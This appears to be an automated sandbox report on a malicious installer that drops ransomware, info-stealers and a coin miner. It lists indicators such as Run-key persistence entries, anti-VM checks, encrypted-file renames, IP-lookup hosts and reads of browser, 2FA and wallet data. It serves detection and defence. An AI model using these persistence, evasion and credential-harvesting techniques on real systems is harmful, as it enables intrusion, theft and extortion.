Malware Analysis Report

2024-10-23 17:52

Sample ID 210911-zgxftsbgc5
Target setup_x86_x64_install.exe
SHA256 291505b584fdf540a1590ce7181d85cee7967f99cbf05aeb7b7031b6a9b4f2cd
Tags
djvu redline smokeloader socelars vidar 119c4tv3 706 aspackv2 backdoor discovery evasion infostealer persistence ransomware spyware stealer trojan raccoon 517 993 glupteba metasploit xmrig 328 dropper loader miner servhelper
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

291505b584fdf540a1590ce7181d85cee7967f99cbf05aeb7b7031b6a9b4f2cd

Threat Level: Known bad

The file setup_x86_x64_install.exe was found to be: Known bad.

Malicious Activity Summary

djvu redline smokeloader socelars vidar 119c4tv3 706 aspackv2 backdoor discovery evasion infostealer persistence ransomware spyware stealer trojan raccoon 517 993 glupteba metasploit xmrig 328 dropper loader miner servhelper

Socelars Payload

Djvu Ransomware

Detected Djvu ransomware

Glupteba Payload

ServHelper

RedLine

SmokeLoader

Registers COM server for autorun

MetaSploit

Suspicious use of NtCreateUserProcessOtherParentProcess

Raccoon

Suspicious use of NtCreateProcessExOtherParentProcess

RedLine Payload

Modifies system executable filetype association

Socelars

Glupteba

Vidar

Process spawned unexpected child process

xmrig

rl_trojan

XMRig Miner Payload

Vidar Stealer

Checks for common network interception software

Grants admin privileges

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Drops file in Drivers directory

Modifies RDP port number used by Windows

Sets DLL path for service in the registry

Modifies extensions of user files

Blocklisted process makes network request

Executes dropped EXE

ASPack v2.12-2.42

Loads dropped DLL

Checks computer location settings

Checks BIOS information in registry

Reads user/profile data of web browsers

Modifies file permissions

Reads user/profile data of local email clients

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Adds Run key to start application

Checks whether UAC is enabled

Checks installed software on the system

Enumerates connected drives

Accesses 2FA software files, possible credential harvesting

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Program crash

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Checks SCSI registry key(s)

Checks processor information in registry

Modifies registry class

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: SetClipboardViewer

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Creates scheduled task(s)

Delays execution with timeout.exe

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious behavior: LoadsDriver

Modifies Internet Explorer settings

Runs net.exe

Modifies registry key

Suspicious behavior: CmdExeWriteProcessMemorySpam

GoLang User-Agent

Enumerates system info in registry

Suspicious behavior: MapViewOfSection

Kills process with taskkill

Modifies system certificate store

Script User-Agent

NTFS ADS

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-09-11 20:41

Signatures

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2021-09-11 20:41

Reported

2021-09-11 21:12

Platform

win10-de

Max time kernel

1809s

Max time network

1815s

Command Line

C:\Windows\Explorer.EXE

Signatures

Djvu Ransomware

ransomware djvu

Modifies system executable filetype association

persistence
Description Indicator Process Target
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe

RedLine

infostealer redline

RedLine Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Registers COM server for autorun

persistence

SmokeLoader

trojan backdoor smokeloader

Socelars

stealer socelars

Socelars Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtCreateProcessExOtherParentProcess

Description Indicator Process Target
PID 5764 created 4464 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 6132 created 7980 N/A \??\c:\windows\system32\svchost.exe C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe

Vidar

stealer vidar

Checks for common network interception software

evasion

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\is-JQ7NE.tmp\46807GHF____.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat191649b47c9e2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19f84b58b3d7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19c6762a08beae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19e4750dd01.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat1946eb84e6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19ba05e89ea6d406.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat199ba8a4637dcb034.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VI625.tmp\Sat19ba05e89ea6d406.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JQ7NE.tmp\46807GHF____.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\ProgramData\1315498.exe N/A
N/A N/A C:\ProgramData\5906308.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
N/A N/A C:\ProgramData\1878738.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udptest.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3002.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-N07PQ.tmp\setup_2.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jhuuee.exe N/A
N/A N/A C:\ProgramData\1878738.exe N/A
N/A N/A C:\ProgramData\8149311.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-0KLL6.tmp\setup_2.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3002.exe N/A
N/A N/A C:\ProgramData\5674691.exe N/A
N/A N/A C:\ProgramData\3821390.exe N/A
N/A N/A C:\ProgramData\8538317.exe N/A
N/A N/A C:\ProgramData\5005950.exe N/A
N/A N/A C:\ProgramData\2744215.exe N/A
N/A N/A C:\ProgramData\8538317.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE N/A
N/A N/A C:\Program Files\MSBuild\GNSNPOGKSY\ultramediaburner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\29-ed191-036-b3094-3522b1974493a\Rilijotusae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-BDIR4.tmp\ultramediaburner.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\c8-94b41-bd0-c5c87-2eedd73aefd53\Ponipevaeca.exe N/A
N/A N/A C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wvthcstx.uzh\GcleanerEU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kfcgfsk4.ydi\anyname.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\zdzubjlj.mxc\gcleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\ffebvvt N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BB94.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C411.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D3E1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D3E1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D3E1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D3E1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E97D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\0a5fa132-bc13-4f09-8ac8-a255db3f0598\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\0a5fa132-bc13-4f09-8ac8-a255db3f0598\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\0a5fa132-bc13-4f09-8ac8-a255db3f0598\build3.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\ConfirmUnpublish.raw => C:\Users\Admin\Pictures\ConfirmUnpublish.raw.wiot C:\Users\Admin\AppData\Local\Temp\D3E1.exe N/A
File renamed C:\Users\Admin\Pictures\RenameCompare.tif => C:\Users\Admin\Pictures\RenameCompare.tif.wiot C:\Users\Admin\AppData\Local\Temp\D3E1.exe N/A
File opened for modification C:\Users\Admin\Pictures\WatchRepair.tiff C:\Users\Admin\AppData\Local\Temp\D3E1.exe N/A
File renamed C:\Users\Admin\Pictures\WatchRepair.tiff => C:\Users\Admin\Pictures\WatchRepair.tiff.wiot C:\Users\Admin\AppData\Local\Temp\D3E1.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\16D8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\16D8.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\29-ed191-036-b3094-3522b1974493a\Rilijotusae.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VI625.tmp\Sat19ba05e89ea6d406.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-N07PQ.tmp\setup_2.tmp N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-0KLL6.tmp\setup_2.tmp N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\SppExtComObj.exe N/A
N/A N/A C:\Windows\system32\SppExtComObj.exe N/A
N/A N/A C:\Windows\system32\SppExtComObj.exe N/A
N/A N/A C:\Windows\system32\SppExtComObj.exe N/A
N/A N/A C:\Windows\system32\SppExtComObj.exe N/A
N/A N/A C:\Windows\system32\SppExtComObj.exe N/A
N/A N/A C:\Windows\system32\SppExtComObj.exe N/A
N/A N/A C:\Windows\system32\SppExtComObj.exe N/A
N/A N/A C:\Windows\system32\SppExtComObj.exe N/A
N/A N/A C:\Windows\system32\SppExtComObj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe N/A
N/A N/A C:\Windows\system32\SppExtComObj.exe N/A
N/A N/A C:\Windows\system32\SppExtComObj.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\system32\SppExtComObj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E97D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\0a5fa132-bc13-4f09-8ac8-a255db3f0598\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\0a5fa132-bc13-4f09-8ac8-a255db3f0598\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E97D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E97D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E97D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E97D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4EE1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4EE1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6076.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6076.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6076.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6076.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6076.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses 2FA software files, possible credential harvesting

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ea3e2026-496c-43c8-a1a7-2bd1df363a74\\D3E1.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\D3E1.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" C:\ProgramData\5906308.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Microsoft.NET\\Jixaevaexiry.exe\"" C:\Users\Admin\AppData\Local\Temp\is-JQ7NE.tmp\46807GHF____.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\"" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Standalone Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe\"" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\16D8.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A api.2ip.ua N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #3 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Azure-Update-Task c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent F0A089F3FD30DA25 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\AdvancedUpdater c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #6 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #2 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #4 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #5 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2559286294-2439613352-4032193287-1000 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\services64 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #1 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\User_Feed_Synchronization-{4F246605-F333-40E5-8FE6-2ED3621ADF90} c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Time Trigger Task c:\windows\system32\svchost.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\16D8.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Microsoft.NET\Jixaevaexiry.exe.config C:\Users\Admin\AppData\Local\Temp\is-JQ7NE.tmp\46807GHF____.exe N/A
File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe C:\Users\Admin\AppData\Local\Temp\is-BDIR4.tmp\ultramediaburner.tmp N/A
File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-BDIR4.tmp\ultramediaburner.tmp N/A
File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-BDIR4.tmp\ultramediaburner.tmp N/A
File created C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MSBuild\GNSNPOGKSY\ultramediaburner.exe C:\Users\Admin\AppData\Local\Temp\is-JQ7NE.tmp\46807GHF____.exe N/A
